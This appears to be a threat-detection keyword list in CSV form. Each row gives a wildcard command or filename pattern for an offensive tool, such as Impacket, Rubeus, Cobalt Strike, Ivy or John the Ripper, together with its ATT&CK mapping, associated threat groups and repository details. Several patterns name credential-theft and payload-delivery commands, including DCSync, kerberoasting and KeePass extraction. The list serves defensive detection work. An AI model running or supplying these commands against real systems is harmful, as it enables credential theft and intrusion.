ipv6-node-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipv6-ra-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-botnet-channels.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-sasl-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-unrealircd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -isbeacon *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* iscsi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE 
Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iscsi-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* isns-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --isroca --publickey *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -it bloodhound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.c -Ix86 *.c -P Local -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.vba -Ix86 *.vba -P Inject -O *,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -jar ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -* jdwp-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-inject.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -JMXConsole -AppName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* john_done*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline 
password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_fork*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load_conf*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load_conf_db*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_log_format*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_log_format2*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_mpi_wait*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* 
john_omp_fallback*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_init*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_maybe_adjust_or_fallback*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_show_info*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_register_all*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_register_one*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_run*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_set_mpi*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_set_tristates*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_wait*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* JohnTheRipper/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* JspShell ua*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* -just-dc-ntlm *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -just-dc-user *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -k * -c *.exe* -p Outlook.Application -o *.hta*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -* -k --kerberoast*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -* -k -request-user * -dc-ip*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* k8gege520 *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* kalilinux/kali-rolling*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* kdbof.cpp*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -* keepass /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* KeeTheft.exe*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,0,private github repo,10,1,N/A,N/A,N/A,N/A -* kerberoast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* kerberoast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
